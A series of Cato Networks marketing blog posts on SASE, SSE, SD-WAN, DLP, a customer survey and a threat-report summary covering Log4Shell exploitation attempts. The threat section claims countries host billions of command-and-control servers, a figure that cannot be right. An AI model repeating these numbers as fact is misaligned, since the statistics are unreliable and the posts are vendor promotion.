Cato’s WAN Firewall provides granular control of traffic between all connected edges (Site, Data Center, Cloud Data Center, and SDP User). Full mesh connectivity is possible, but the WAN Firewall has an allow-list approach to encourage a zero-trust access approach. The combination of source, destination, device, application, service, and other contexts is extremely flexible, allowing administrators to easily configure the necessary access between their users and locations. For example, typically only IT staff and management servers will need to connect to mobile SDP users directly, and this can be allowed in just a few clicks, or if you want to allow all SMB traffic between a site where your users are and a site with your file servers, that can also be done just as easily.
More About Cato’s Additional Security Capabilities
Cato has additional security capabilities beyond what we’ve covered, including DLP and CASB that have their own policy sets and as we continue to develop and deploy new capabilities you may see more added as well. But like what you’ve seen so far, you can expect simple, easy-to-build policies with powerful granular controls based on the shared context of both networking and security engines. Of course, all policy and service controls will be delivered from a true single-management point – the Cato Management Application.
Cato SSE 360 = SSE + Total Visibility and Control
For more information on Cato’s entire suite of converged, network security, please be sure to read our SSE 360 Whitepaper. Go beyond Gartner’s defined scope for an SSE service that offers full visibility and control of all WAN, internet, and cloud. Complete with configurable security policies that meet the needs of any enterprise IS team, see why Cato SSE 360 is different than traditional SSE vendors.
SD-WAN, SASE, & SSE are becoming mainstream, but confusion hasn’t left the building. Yet. What survey are you talking about? Twice a year, Cato Networks...
Cato 2022 Mid-Year Survey Result Summary SD-WAN, SASE, & SSE are becoming mainstream, but confusion hasn’t left the building. Yet.
What survey are you talking about?
Twice a year, Cato Networks runs a global survey that collects and analyzes the state of enterprise networking and security. Our last survey has broken all records with 3129 respondents from across the globe. More accurately, 37% from America, 33% from Europe, middle east and Africa, and 30% from Asia and Australia.
52% of them were channel partners (not necessarily ours, yet), and 48% were end customers. All of them, collectively, work with network and network security on a daily basis and know a thing or two about highest priority challenges faced by the modern enterprise.
Respondent demographics also indicate that we are looking at a versatile and reliable dataset. In terms of enterprise sizes, 27% of respondents have more than 100 sites to manage, 22% have between 25 to 100, and 51% have up to 25 sites. 44% of them operate a global organization compared to 56% who are regional or national.
When asked about their position and responsibilities, 62% confirmed they hold an IT management or leadership position. 27% with specific focus on network and 17% with specific focus on security.
We believe it’s fair to say the results we’re going to share here are as objective as possible.
The Market is Aware of SASE and SSE, But Aren’t Clear on the Differences
The market is showing awareness and understanding of both SASE (est. 2019) and Security Service Edge (SSE) (est. 2021.) However, the rise of “too many acronyms” is leading to market confusion, specifically related to architecture, value propositions and differentiation.
When we asked, “How well do you believe you understand the SASE architecture and its benefits?”, 45% responded that they feel they understand both very well. It would look very positive if we stopped here, but at the same time, 20% felt vague regarding the architecture, 12% felt vague about the value, and 23% felt vague about both. Oh no.
The confusion continued even further when we asked if they know what’s the difference between SASE and SSE. It wasn’t a test, but only 47% passed. Very close to the 45% who felt confident on SASE’s architecture and value.
Going about it from another angle, we asked “Do you consider SSE as an interim step to SASE?”. 29% answered they do, and 38% answer they don’t. The red flag is the 33% who answered that they aren’t sure what the difference is between SSE and SASE.
[boxlink link="https://www.catonetworks.com/resources/cato-sse-360-finally-sse-with-total-visibility-and-control/?utm_source=blog&utm_medium=top_cta&utm_campaign=cato_sse_360"] Cato SSE 360: Finally, SSE with Total Visibility and Control | Whitepaper [/boxlink]
Choose Wisely: Will it Be One or Multi-Vendor SASE?
In answer to our question “What is your SASE migration timeline?”, 17% responded it already stared in 2020 or 2021, 18% responded that it is happening this (2022) year, and 44% said that it’s targeted for 2023.
Similarly, 54% reported they already have C-level sponsorship for their SASE project from either their CEO (12.5%), CIO (24%), CFO (5%) or CISO (12.5%).
But with so much focus on SASE and confusion surrounding SSE, what’s most important to pay attention to?
36% of respondents who already have SD-WAN in their networks indicated that they plan to replace it. 29% plan to deploy SSE as an interim step towards full SASE deployment, and 38% told us they are going all in on SASE.
On top of those findings, 40% indicated that a single-vendor SASE is very important in their vendor selection, and 25% ranked this as extremely important. This correlates very well with 77% who indicated a single management for all network and security infrastructure is very or extremely important.
So, what’s the gist here?
The bottom line here is simple. SASE is the end-game and the SASE revolution is currently well underway.
Every IT leader and team should both strategize and prioritize their path to SASE. It can be a gradual multi-project approach or undertaken as a single project. It can rely on an existing network and security stack or a refresh of legacy products.
Crowd wisdom also shows that so many people who work daily with SD-WAN, SASE and SSE value the importance of single-vendor and single management solutions, and so should you.
So, when your C-level sponsor asks you about your SASE migration strategy, make sure you are aligned with the voice of the industry, that you have a plan, and that you know how to choose the right vendor for your enterprise.
And what about the confusion between SASE and SSE? What about those who don’t feel they know enough about one or both acronyms? It’s a perfectly normal place to be in, and a challenge anyone can easily overcome in just a few short hours.
Cato Networks offers free SASE and SSE education courses to get you up to speed and on par with industry standards. Check out our free SASE and SSE certification courses, to expand your knowledge base, and learn about these new and evolving categories.
Now how ‘bout that?
Technology is fast-paced and constantly changing, but it seems like the past few years have broken every record. Covid-19 and the transition to remote work,...
15 Networking Experts To Follow on LinkedIn Technology is fast-paced and constantly changing, but it seems like the past few years have broken every record. Covid-19 and the transition to remote work, high-profile cyber security attacks and massive geo-political shifts have enhanced and intensified the need for new networking solutions, and vendors are quick to respond with new networking point solutions which address the problems de jour.
But how can IT teams and network architects make heads or tails of these rapid shifts? Such intense global and industry-wide changes require the advice of experts who are familiar with both the technical and business landscape, and can speak to the newest technology trends.
Below, we’ve listed 15 of the top experts in enterprise networking and SD-WAN that we recommend following on Linkedin. They are masters in their domain, and industry leaders who can help you stay up-to-date with the latest developments in the world of enterprise networking. They have many years of hands-on and consulting experience, so when they speak about enterprise networks, it’s always worth hearing what they have to say.
1. Greg Ferro
https://www.linkedin.com/in/etherealmind/
@etherealmind
Greg is a co-founder of Packet Pushers, an online media outlet that has covered data, networking and infrastructure for over 12 years. Packet Pushers provides valuable information that can help nearly any professional in the networking field including insights on: public cloud usage, SD-WAN, five minute vendor news, IPv6, and more. Home to a series of podcasts, blog posts, articles, a Spotify channel, and even a newsletter - it’s a multi-media experience. Besides Packet Pushers, Greg runs another well-known industry blog, EtherealMind.com.
2. Ivan Pepelnjak
https://www.linkedin.com/in/ivanpepelnjak/
@ioshints
Ivan is a blogger at ipSpace.net, an author, a webinar presenter and a network architect. His writings and webinars focus mainly on network automation, software-defined networking, large-scale data center tech, network virtualization technologies and advanced IP-based networks. By following him and/or ipSpace.net, you will have access to a plethora of network technology resources, including online courses, webinars, podcasts and blogs.
3. Orhan Ergun
https://www.linkedin.com/in/orhanergun/
@OrhanErgunCCDE
Orhan is an IT trainer, an author and a network architect. On Linkedin, Orhan shares his ideas and thoughts, as well as updates about his recent webinars, blog posts and training courses, to his ~40,000 followers. He also spices up his updates by sprinkling in funny memes with inside IT humor. Orhan’s courses can be found on his website at orhanergun.net, where he focuses on network design, routing, the cloud, security and large-scale networks.
4. Jeff Tantsura
https://www.linkedin.com/in/jeff-tantsura/
Jeff is a Sr. Principal Network Architect at Azure Networking, as well as a writer, editor, podcaster, patent inventor and advisor to startups in networking and security areas. His podcast, “Between 0x2 Nerds”, is bi-monthly and discusses networking topics including: network complexity, scalability, up-and-coming technologies and more. The podcast hosts industry experts, software engineers, academia researchers and decision-makers - so when listening to it, you can expect to hear from professionals with a wide variety of opinions, points of view and areas of expertise!
5. Daniel Dib
https://www.linkedin.com/in/danieldib/
@danieldibswe
Daniel Dib is a Senior Network Architect experienced in routing, switching and security. He is also a prolific content creator, writing blog posts for his own networking-focused blog “Lost in Transit”, as well as additional publications, like “Network Computing”. It’s a great choice if you’re interested in learning more about CCNA, CCNP, CCDP, CCIE, CCDE and all of our various certification courses. His social media posts cover both professional and personal matters, for those of you who like to get to know the person behind the professional.
[boxlink link="https://www.catonetworks.com/resources/4-considerations-to-take-before-renewing-your-sd-wan-product-or-contract/?utm_source=blog&utm_medium=top_cta&utm_campaign="4_considerations_before_sd-wan"] 4 Considerations to Take Before Renewing Your SD-WAN Product or Contract | EBOOK [/boxlink]
6. David Bombal
https://www.linkedin.com/in/davidbombal/
@davidbombal
David Bombal is an author, instructor and YouTuber, creating content for networking professionals across multiple channels. Focusing on topics like network automation, Python programming, ethical hacking and Cisco exams, his videos, podcasts and courses provide a wide range of resources for beginners and advanced learners. David’s online Discord community is also worth visiting, as an online venue for ongoing IT support and communication.
7. John Chambers
https://www.linkedin.com/in/johnchambersjc/
@JohnTChambers
John is the CEO of JC2 Ventures and was previously at Cisco for 26 years, serving as CEO, Chairman and President, among other positions. With more than 263,000 followers on Linkedin and more than 22,000 on Twitter, John is an important source of information for networking professionals interested in a broader, more strategic view of the technological market.
8. Tom Hollingsworth
https://www.linkedin.com/in/networkingnerd/
@networkingnerd
Tom is a networking analyst at Foskett Services and the creator of networkingnerd.net, an online media outlet where he offers a tongue-in-cheek take on networking news and trends. In his latest post he compares Apple Air Tags and lost luggage at airports to SD-WAN. If blog posts aren’t your thing, you can also hear what Tom has to say on his “Tomversations” YouTube playlist or by attending the “Tech Field Day” events he organizes.
9. Matt Conran
https://www.linkedin.com/in/matthewconranjnr/
Matt is a cloud and network architecture specialist with more than 20 years of networking experience in support, engineering, network design, security and architecture. Matt juggles consultancy as an independent contractor with publishing technical content on his website “Network Insight” and with creating training courses on Pluralsight. On his website, you can find helpful explainer videos and posts on a variety of networking topics including cloud security, observability, SD-WAN and more.
10. Russ White
https://www.linkedin.com/in/riw777/
@rtggeek
Russ White is an infrastructure architect, co-host of “The Hedge”, a computer network podcast, and blogger. He has also published a number of books on network architecture. His Linkedin posts are a bulletin board of his latest blog and podcast updates, so by following him you can stay on track of his latest publications, ranking from hands-on network advice to info on how technology will be shaped by global events.
11. Ben Hendrick
www.linkedin.com/in/bhendrick/
Ben is the Chief Architect in the Office of the CTO of the Global Secure Infrastructure Domain at Microsoft. His Linkedin posts focus mainly on recent cybersecurity updates, covering specific events as well as industry trends. With nearly 35 years of network and security experience, you can be sure his daily updates are based on broad insights and a deep familiarity with the networking and security space.
12. Ashish Nadkarni
https://www.linkedin.com/in/ashishnadkarni/
@ashish_nadkarni
Ashish leads two research groups at analyst firm IDC. Both of them - Infrastructure Systems, Platforms and Technologies (ISPTG) and BuyerView Research - are part of IDC's Worldwide Enterprise Infrastructure practice. Ashish delivers reports, blog posts and webinars, and his Linkedin feed to keep up with the latest trends and technologies in networking. Examples of his previous posts include preparing for IT infrastructure supply shortages, storage for AI workloads, and takeaways from networking industry events.
13. Erik Fritzler
https://www.linkedin.com/in/erikfritzler/
@FritzlerErik
Erik has nearly 25 years of experience in network architecture and regularly posts blogs on “Network World”. He specializes in SD-WAN, Network Design, and Engineering and IT Security. In his recent blog post “Why WAN metrics are not enough in SD-WAN policy enforcement”, he discusses how SD-WAN captures metrics that go far beyond the typical WAN measurements including application response time, network transfer time, and server response time.
14. Matt Simmons
https://www.linkedin.com/in/mattsimmonssysadmin/
@standaloneSA
Matt is an SRE at SpaceX, where he is responsible for the infrastructure around the ground control plane. His team owns the OS installation on bare metal, up through the Kubernetes orchestration layer, as well as monitoring, CI/CD and more. If you’re interested in learning about technological “How To’s” and the science of space, Matt’s Linkedin is the place for you. Matt also has a Github repository where he hosts projects and experiments that may be helpful to networking professionals.
15. Cato Networks
https://www.linkedin.com/company/cato-networks/
https://twitter.com/CatoNetworks
Did you know that Cato Networks is also on social? Our social channels are a great way to keep on top of SASE and Security Service Edge (SSE) updates, read original research and even get access to “member only” exclusive events. We run surveys, host giveaways and include updates from industry experts, like our CEO and COO, Shlomo Kramer (co-founder of Check Point,) and Gur Shatz (co-founder of Imperva).
Who Do You Follow?
As business needs and technologies evolve, it can be difficult to constantly keep up with the changes. Experts like the 15 listed above can help, by passing on their know-how, insights and experience through their Linkedin, blogs, Youtube channels, or whatever way you prefer to consume content.
So, who do you follow? Share with us on Linkedin.
In 2021, Gartner introduced a new security category – SSE (Security Service Edge). In this blog post, we’ll explain what SSE is, how SSE is...
SSE (Security Service Edge): The Complete Guide to Getting Started In 2021, Gartner introduced a new security category - SSE (Security Service Edge). In this blog post, we’ll explain what SSE is, how SSE is different from SASE and compare traditional SSE solutions to Cato SSE 360. This blog post is an excerpt from our new Cato SSE 360 whitepaper, but if you’re interested in learning more information, we highly recommend you read the complete whitepaper.
What is SSE?
Before we explain SSE, let’s start by giving more context. In 2019, Gartner introduced the new SASE market category. SASE (Secure Access Service Edge) is the convergence of SD-WAN and network security as a cloud-native, globally-delivered service. As a result, SASE solutions can provide work from anywhere (WFA users) with optimized and secure access to any application. From the security side, SASE includes SWG, CASB/DLP, FWaaS and ZTNA.
Then, in 2021, Gartner introduced another related market category called SSE (Security Service Edge). SSE offers a more limited scope of converged network security than SASE. SSE converges SWG, CASB/DLP and ZTNA security point solutions, into a single, cloud-native service. Therefore, SSE provides secure access to internet and SaaS applications, but does not address the network connectivity and east-west WAN security aspects of that access, which remains as a separate technology stack.
[boxlink link="https://www.catonetworks.com/resources/cato-sse-360-finally-sse-with-total-visibility-and-control/?utm_source=blog&utm_medium=top_cta&utm_campaign=cato_sse_360"] Cato SSE 360: Finally, SSE with Total Visibility and Control | Whitepaper [/boxlink]
SSE vs. SASE
To sum up the comparison:
SASE Traditional SSE Services Year Introduced 2019 2021 Technological Pillars Converged Networking and Network Security Limited convergence of network security only Key Components SD-WAN, SWG, CASB/DLP, FWaaS, ZTNA, RBI, Unified Management SWG, CASB/DLP and ZTNABusiness Value Resiliency, security, optimization, visibility and control Limited network security (secure access to SaaS and web traffic)
Why Do Businesses Need SSE? (Traditional SSE Capabilities and Benefits)
Optimized and secure global access to internet and SaaS applications and data is essential for businesses’ technical requirements and the evolving threat landscape. But rigid security architectures and disjointed point solutions lower business agility and increase risk. This is where SSE shines.
SSE provides:
Consistent security policy enforcement - full inspection of traffic between any two edges while enforcing threat prevention and data protection policies Reduced attack surface with Zero Trust Network Access (ZTNA) - ensuring users can only access authorized applications Elastic, high performance security inspection - securing traffic at scale through a global backbone of scalable Points of Presence (PoPs) Improved security posture - monitoring the threat landscape and deploying mitigations to emerging threats through the SSE provider’s SOC (instead of the IT staff) Reduced enterprise IT workload without customer involvement - continuously updating the cloud service with new enhancements and fixes, while reducing workload
As a result of these benefits, SSE offers businesses secure public cloud and web access, threat detection and prevention capabilities, secure and optimized remote access and sensitive Data Loss Prevention.
How to Get Started with SSE
Today, many businesses are still using legacy architectures. This impedes digital transformation because:
Legacy networks are built around physical corporate locations - a digital architecture requires re-architecture of the network
Centralized (backhauling) security models slow down secure cloud access - direct secure Internet should be available at any location for any user
Legacy security solutions can’t scale - they can’t support a hybrid workforce working from anywhere
Disjointed solutions are fragmented and complex to manage - this requires more work from IT and increases the likelihood of manual configuration errors
To get started with SSE, businesses should choose an SSE vendor that can help them overcome these challenges. Such a vendor will provide total visibility and control across all edges and all traffic, support a global footprint with high performance security, converge management and analytics with a single pane of glass, ensure a future proof and resilient SSE service.
Introducing Cato SSE 360: Going Beyond Gartner’s SSE
Cato SSE 360 goes beyond Gartner’s scope of SSE, to provide total visibility, optimization and control for all traffic, users, devices, and applications everywhere. Not only does it provide secure and optimized access to the internet and public cloud applications, but also to WAN resources and cloud datacenters, reducing your attack surface and eliminating the need for additional point solutions like firewalls, WAN optimizers and global backbones. And, Cato SSE 360 provides a clear path to single-vendor SASE convergence through gradual migration, if and when your organization requires. Follow the link for more information about Cato SSE 360.
Cato SSE 360 reduces cost and complexity with simple management through a single pane of glass, self-healing architecture and defenses that evolve automatically while mitigating emerging threats. Customers can choose to manage themselves or co-manage with partners.
Platform overview:
Cato SSE 360 Components
Cato SSE 360 provides the following platform components:
Cloud-native security service edge Cato global private backbone Cato SDP clients IPsec-enabled devices and Cato Socket SD-WAN for locations Comprehensive management application for analytics and policy configuration
As a result, Cato SSE 360 is ideal for the following use cases:
Scalable hybrid work
Gradual cloud migration Secure sensitive data Instant deployment of security capabilities Future-proofing and ongoing security maintenance Seamless, single-vendor SASE convergence
Cato SSE 360 extends SSE by providing full visibility and control across all traffic, optimized global application access and is the only service which supports a seamless path to a complete, single-vendor SASE, if and when required. Read the full Cato SSE 360 whitepaper and get started on your SSE journey today.
Log4j is a Java-based, ubiquitous logging tool that is said to be used by nearly 13 billion devices world-wide. Late last year, in December 2021,...
Spring4Shell Might Grab Headlines, But Log4j Exploits Swamped Enterprises, Finds Cato Threat Report Log4j is a Java-based, ubiquitous logging tool that is said to be used by nearly 13 billion devices world-wide. Late last year, in December 2021, the Apache Software Foundation announced the discovery of a software vulnerability (CVE-2021-44228 a.k.a. Log4Shell) that allows unauthenticated users to remotely execute or update software code on multiple applications via web requests. As soon as the vulnerability was announced, researchers at Cato Networks noted over 3 million attempts (in Q4 2021) aimed at exploiting this vulnerability.
Fast forward to Q1 2022 and the number of attempts to exploit this vulnerability have increased to a whopping 24 million. According to the Cato Networks SASE Threat Research Report, Log4j vulnerabilities were leveraged all across the world, including cyber-attacks on Ukrainian organizations.
Interestingly, number two on the list of the top five CVE exploit attempts was a Java vulnerability (CVE-2009-2445) that has been around for more than a decade. Threat actors made almost 900,000 attempts (double than previous quarter) to exploit this vulnerability for initial access. Above research highlights the fact that while certain zero-day vulnerabilities (like Spring4Shell or CVE-2022-22965) grabbed news headlines, it is the legacy vulnerabilities that put enterprises at the most risk.
[boxlink link="https://www.catonetworks.com/cybersecurity-masterclass/?utm_source=blog&utm_medium=top_cta&utm_campaign=masterclass"] Join one of our Cyber Security Masterclasses | Go now [/boxlink]
Majority of Exploitation Events Originated in the U.S.
Understanding where attacks originate from or who (or where) the malware communicates to is a critical part of any organization's threat response strategy. Attackers are aware of the fact that traffic to or from certain countries may be blocked, inspected or investigated and that’s the reason why a majority of them ensure that their command and control (C&C) infrastructure is hosted in a country that is labeled as “safe”. While the U.S. is the most favored destination (hosts 17.3 billion C&C servers), China comes second (with 2 billion C&C servers), followed by Germany (1.66 billion), UK (1.29 billion) and Japan (1 billion).
Reputation-based Threats, Brute Force and Remote Code Execution Attacks Skyrocket
After analyzing 26 billion security events across 350 billion network flows, Cato researchers noted a 33% decline in attackers attempting to perform network scans. That being said, network scans still reign as the number one threat type (10 billion plus attempts), followed by reputation-based threats (1.5 billion attempts) or security events that are triggered by inbound or outbound communications to known malicious destinations.
Reputation-based threats grew more than 100% over the previous quarter. In addition to this, the Cato Threat Hunting System also observed that crypto-mining numbers continue to climb, while brute force attacks and remote code execution attacks have nearly tripled in comparison to the previous quarter.
Attackers Are Frequently Scanning Network Hardware and Software For Initial Access
Cato carried out an analysis based on the MITRE ATT&CK framework and concluded that network-based scanning is the most frequently used attack vector to gain initial access in an enterprise environment. Active Scanning (T1595 - 6.9 billion flows), Network Discovery (T1046 - 4.1 billion flows) and Remote System Discovery (T1018 - 2.7 billion flows) are the top three techniques employed by attackers. That’s not all, once adversaries have initial access they actively search data from local systems (T1005 - 9.5 million incidents), look for valid accounts (T1078 - 6.9 million incidents) and try to brute force access if credentials are not accessible (T1110 - 6.9 million incidents).
Risks Are Also Originating from Popular Consumer Apps Like Telegram and TikTok
While many governments have raised privacy concerns around the use of TikTok and even attempted to censor its use, Cato research finds that most enterprises still continue to allow TikTok flows. In fact, use of this short form video-haring app grew by 10% over the previous quarter. In addition to this, use of the instant-messaging app Telegram more than tripled, probably due to the Ukraine-Russia crisis, and YouTube grew by 25%. Growth in such non-business, consumer apps operating on enterprise networks significantly widens the attack surface, exposing organizations and people to greater risk of being targeted with phishing and other social engineering schemes.
What Can Organizations Do To Protect Themselves?
While security isn’t one-size-fits-all, below are some general recommendations and best practices that can help:
Execute a detailed audit of every website, system and application on a regular basis. Prioritize critical risks and plug those loopholes proactively.Patch all applications regularly and ensure they are running the most up-to-date software.Replace security point solutions and legacy network services with a solution that is more converged (or holistic) like SASE. A convergence of networking and security provides unique visibility into network usage, hostile network scans, exploitation attempts and malware communication to C&C servers.When organizations encounter zero-day vulnerabilities like Log4j, they must immediately implement virtual patching so that security teams can neutralize the threat and buy additional time till they are able to apply necessary and permanent fixes.Train staff regularly so they do not fall prey to phishing and social engineering scams.Try and restrict use of consumer applications (e.g., TikTok, Telegram) in enterprise environments as this can significantly minimize risk and lower possibility of infectious lateral movement.Be vigilant, have reporting and monitoring processes in place and be on guard for any changes in the attack surface.
Follow the link to get the full Q122 Cato Networks SASE Threat Research Report.
Happy To Announce the Birth of a New Technology – SD-WAN It wasn’t that long ago that we oohed and ahhed over the brand-new technology...
Is SD-WAN Really Dead? Happy To Announce the Birth of a New Technology - SD-WAN
It wasn’t that long ago that we oohed and ahhed over the brand-new technology called SD-WAN. The new darling of the networking industry would free us from the shackles of legacy MPLS services. But just as we’re getting used to the toddling SD-WAN, along came yet another even more exciting newborn, the Secure Access Service Edge (SASE). It would give us even more – more security, better remote access, and faster deployment. SD-WAN? That’s so yesteryear – or is it? Is SD-WAN another networking technology to be cast off and forgotten in this SASE world, or does SD-WAN continue to play an important role? Let’s find out.
SD-WAN: The Toddler Years
When SD-WAN was born, there was much to love. It was cute, shiny, and taught enterprises how to walk -- walk away, that is, from MPLS – to a network designed for the new world. MPLS came of age when users worked in offices, resources resided in the datacenter, and the Internet was an afterthought. It was hopelessly out of step with a world that needed to move fast and one obsessed with the Internet.
SD-WAN addressed those problems, creating an intelligent overlay that allowed companies to tap commodity Internet connections to overcome the limitations of MPLS. More specifically this meant:
More capacity to improve application performanceReduced network costs by using affordable Internet access, not high-priced MPLS capacity.More bandwidth flexibility by aggregating Internet last mile connectionsImproved last-mile availability by connecting sites through active/active connectionsFaster deployments allowing sites to be connected in days not months
[boxlink link="https://www.catonetworks.com/resources/5-things-sase-covers-that-sd-wan-doesnt/?utm_source=blog&utm_medium=top_cta&utm_campaign=5_sd-wan_gaps_answered_by_sase"] 5 Things SASE Covers that SD-WAN Doesn’t | EBOOK [/boxlink]
SD-WAN: The Teenager That Disappoints
But then the world changed – again. Resources moved into the cloud and the pandemic sent everyone home. Suddenly the office was no longer the focus of work. Solving the site-to-site communications challenge was no longer sufficient. Now companies needed a way to bring advanced security to wherever resources resided, in the cloud or the private data center, and wherever users worked, in the office, at home, or on the road, and do all of that without compromising performance. None of that was in SD-WAN's job description, making the following use cases particularly challenging:
Remote Workforce
SD-WAN lacks support for remote access -- period. There was no mobile client to join an SD-WAN. But today secure remote access is an essential pillar for guaranteeing business continuity.
Cloud Readiness
SD-WAN is limited in its cloud readiness. As an appliance-based architecture, SD-WAN requires the management and integration of proprietary appliances to connect with the cloud. Expensive premium cloud connectivity solutions, like AWS Direct Connect or Azure ExpressRoute for optimized cloud connectivity.
Global Performance
SD-WAN might perform well enough within a region, but the global Internet is too unpredictable for the enterprise. It’s why all SD-WAN players encourage the use of third-party backbones for global connectivity. Such an approach, though, increases the complexity and costs of a deployment, and fails to deliver the benefits of optimized performance.
Advanced Security
SD-WAN lacks the necessary security to protect branch offices. Next-generation firewall (NGFW), Intrusion Prevention Systems (IPS), Secure Web Gateway (SWG), anti-malware – all necessary components for protecting the enterprise and none of which are provided by SD-WAN. Factoring in the necessary appliances and services for delivering these capabilities significantly increases the cost and complexity of SD-WAN deployments.
SD-WAN: The Senior Years
So, SD-WAN isn’t perfect, but you might be wondering, why not let it coexist with the rest of the security and networking infrastructure? Just deploy a SWG or a Security Service Edge (SSE) solution. Doing so, though, leads to a network that’s at best managed with separate brains – one for your SD-WAN and another for your security infrastructure – and more likely additional “brains” for handling the rest of your security infrastructure and the global backbone.
And with multiple brains, everything becomes more complicated:
Forget zero-touch:SD-WAN made noise about claiming to offer zero-touch configuration, but the reality is far different. Without the necessary security capabilities, SD-WANs become far more complicated to deploy, requiring the additional security appliances to be assessed, purchased, delivered to the locations, installed, and integrated.
High Availability (HA) becomes a headache:With SD-WAN relying on Internet connections, HA is all but required. But with multiple brains, HA becomes far more challenging. There’s no automated provisioning of resilient connections between devices or services. There’s also no associated dynamic failover, requiring companies to install backup appliances and additional operational time testing failover scenarios.
Visibility is limited:Fragmenting data across multiple networking and security systems means you never have a complete view of your network. You can’t spot the network indicators of new threats. Outages become more difficult to troubleshoot with data hiding within multiple appliance logs.
Relying on SSE offerings or security services in the cloud won’t fully address the problem. Deployment is still a problem as there’s no automated traffic routing and tunnel creation between SD-WAN devices and cloud security PoPs. Security infrastructure is also unable to consume and share security policies (such as segmentation) between SD-WAN and cloud security vendors. Operationally, SD-WAN devices and cloud services remain distinct, making troubleshooting more challenging and depriving security teams of networking information that could be valuable in hunting for threats.
And in the end, reducing to two brains better than four, still leaves you with well, two brains on one network.
SD-WAN: It’s Not Dead Just Part of a Bigger Family
So, is SD-WAN dead? Hardly. It remains what it always was – an important tool for building the enterprise network. But like the crazy uncle who might great for laughs but not be terribly reliable, SD-WAN has limitations that need to be addressed.
What’s needed is an approach that uses SD-WAN to connect locations but addresses its security and deployment limitations. SASE secures and connects the complete enterprise – headquarters, branches in distant locations, users at home or on the road, and resources in the cloud, private datacenters, or on the Internet. With one network securing and connecting the complete enterprise, deployments become easier, visibility improves, and security becomes more consistent.
To make that happen, SASE calls for moving the bulk of security and networking processing into a global network of PoPs. SD-WAN devices connect locations to the nearest PoPs; VPNs clients or clientless access connect remote and mobile users. Native cloud connectivity within the PoPs connects IaaS and SaaS resources.
Cato is the World’s First and Most Robust Global SASE Platform
Cato is the world’s first SASE platform, converging SD-WAN and network security into a global, cloud-native service. Cato optimizes and secures application access for all users and locations, including branch offices, mobile users, and cloud datacenters, and allows enterprises to manage all of them with a single management console with comprehensive network visibility. Cato’s SASE platform has all the advantages of cloud-native architectures, including infinite scalability, elasticity, global reach and low total cost of ownership.
Connecting locations to the Cato SASE Cloud is as simple as plugging in a preconfigured Cato Socket appliance, which connect to the nearest of Cato’s 70+ globally dispersed points of presence (PoPs). Mobile users connect to the same PoPs from any device by running the Cato Client. With Cato, new locations or users can be up and running in hours or even minutes, not days or weeks. Security capabilities include Zero Trust Network Access (ZTNA), Secure Web Gateway (SWG), Cloud Access Security Broker (CASB), Data Loss Prevention (DLP), and Firewall as a Service (FWaaS).
With Cato, customers can easily migrate from MPLS to SD-WAN, optimize global connectivity to on-premises and cloud applications, enable secure branch office Internet access everywhere, and seamlessly integrate cloud datacenters and mobile users into a high-speed network with a zero-trust architecture. So whether it's mergers and acquisitions, global expansion, rapid deployments, or cloud migration, with Cato, the network and your business are ready for whatever is next in your digital transformation journey.
The Information Revolution and The Growing Importance of Data We have all heard about the information revolution, but what does it actually mean and how...
Are You Protecting Your Most Valuable Asset with a Data Loss Prevention (DLP)? The Information Revolution and The Growing Importance of Data
We have all heard about the information revolution, but what does it actually mean and how profound is it? An interesting way to understand this is by looking at how it has impacted modern enterprises.
A company's assets can be divided into two types: tangible vs intangible. Simply put, tangible assets are those with a physical form factor (or which represents something physical). Intangible assets are those which do not really exist in the conventional sense, such as a company's Intellectual property. Research by Ocean Tomo1 covering the leading 500 companies in the US (S&P 500) shows that in 1975, intangible assets accounted for 13% of their total value. By 2015 it grew to 84% and by 2020 it reached 90%.
Figure 1: The value of intangible assets
Simply put, 90% of the value of a modern-era company comes from what it knows, only 10% from what it has. When looking at how these numbers shifted over the last 45 years, we can see how information has become the single most valuable asset for the modern enterprise.
Most enterprises, however, do not have the necessary means to effectively protect their data. Let's take a look at why this is, what protecting enterprise data means, and how to choose the right solution for your enterprise.
Protecting Your Company's Data With DLP
Information has critical value to an enterprise. It is, however, quite difficult to protect, especially considering a great part of it typically resides in the cloud. There are numerous tools aimed at restricting access to enterprise assets, but the most efficient solution to protect the movement of information to and from enterprise assets is Data Loss Prevention (DLP).
While DLP solutions have been around for 15 years, their adoption has been limited and mostly by high-end enterprises. The complexity, prohibitive costs and expertise required to obtain and effectively manage DLP solutions has left them beyond the reach of most enterprises.
The increasing value of information, the growing adoption of cloud computing, and continued rise in cybercrime, are driving enterprises to the realization that they need to do a better job protecting their data. The need for DLP is clear and imminent, and market interest is rising.
Gartner saw a 32% rise in DLP inquiries in 2020 vs the previous year2. But how can enterprises overcome the current adoption barriers and enable DPL protection for their assets? Let us start by looking at the types of DLP solutions and their respective advantages and shortcomings.
[boxlink link="https://www.catonetworks.com/resources/protect-your-sensitive-data-and-ensure-regulatory-compliance-with-catos-dlp/?utm_medium=blog_top_cta&utm_campaign=cato_dlp"] Protect Your Sensitive Data and Ensure Regulatory Compliance with Cato's DLP | Whitepaper [/boxlink]
DLP isn't one thing
Gartner recognizes three types of DLP solutions2:
Enterprise DLP (EDLP)Integral DLP (IDLP)Cloud Service Provider Native DLP (CSP-Native DLP)
The above solutions all have their pros and cons, and the acquiring decision-makers need to decide which solution attributes are more important for their use-cases, and which can be compromised. Let us take a deeper look into each one.
Enterprise DLP (EDLP) - An enterprise level solution which covers all relevant traffic flows, and which is implemented as a stand-alone solution. EDLPs require adding (yet) another solution to an organization’s security toolbox. This typically requires an expansive project plan and additional expertise, adding complexity and cost to the project. While an EDLP offers a single console and policy management interface for the entire network, it is typically a separate console from the other network security tools (FW, IPS, AM, SWG, etc.). EDLPs will typically add another hop in the security service chain, and thus add latency and impact performance.
Figure 2: Enterprise DLP
Integrated DLP (IDLP) - DLP functionality that is added on top of a pre-existing security product such as a Secure Web Gateway (SWG). IDLPs simplify the deployment process and are regarded as a quick win to get DLP up and running quickly and at a reduced cost. IDLPs, however, are limited to the traffic and use cases the base product is intended for. Piggybacking on a SWG, for example, will cover only Internet-bound traffic and may not inspect IaaS traffic. Gaining wider coverage will require adding DLP to additional security products, which will lead to fragmented consoles and policy management.
Figure 3: Integrated DLP
CSP-Native DLP - A cloud-based DLP which is deployed in, or provided by, a cloud service provider (CSP). This type of solution is also simple to adopt as it is delivered as a Software as a Service (SaaS) and doesn't require deployment. It is, however, limited to the traffic sent to or from the specific CSP proving it. As most enterprises using cloud platforms are adopting a multi-cloud strategy, getting complete coverage will require using DLP services from several CSPs. Also, this type of solution will typically not cover all SaaS applications and is typically limited to sanctioned applications only.
Figure 4: CNP-Native DLP
Choosing The Right DLP For Your Enterprise
